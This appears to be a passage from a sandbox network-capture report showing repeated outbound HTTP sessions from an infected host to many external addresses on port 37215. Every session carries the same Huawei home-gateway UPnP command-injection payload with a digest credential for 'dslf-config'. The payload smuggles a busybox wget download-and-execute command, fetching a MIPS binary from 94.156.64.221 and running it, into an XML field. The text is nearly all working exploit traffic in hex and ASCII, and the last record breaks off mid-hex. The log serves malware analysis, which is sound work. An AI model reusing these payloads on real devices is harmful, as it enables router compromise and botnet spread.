                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    647192.168.2.2350172197.78.23.22737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.305803061 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    648192.168.2.2342754197.119.106.16737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.305830956 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    649192.168.2.233492441.219.48.22737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.305876970 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    650192.168.2.234372641.201.42.16737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.305907965 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    651192.168.2.2340892197.254.140.11937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.305938959 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    652192.168.2.2359194197.192.206.2937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.305968046 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    653192.168.2.234710841.12.155.5437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.306008101 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    654192.168.2.234625841.136.89.4037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.306046963 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    655192.168.2.233474241.127.231.3537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.306077003 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    656192.168.2.2336192156.29.82.20937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.306118011 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 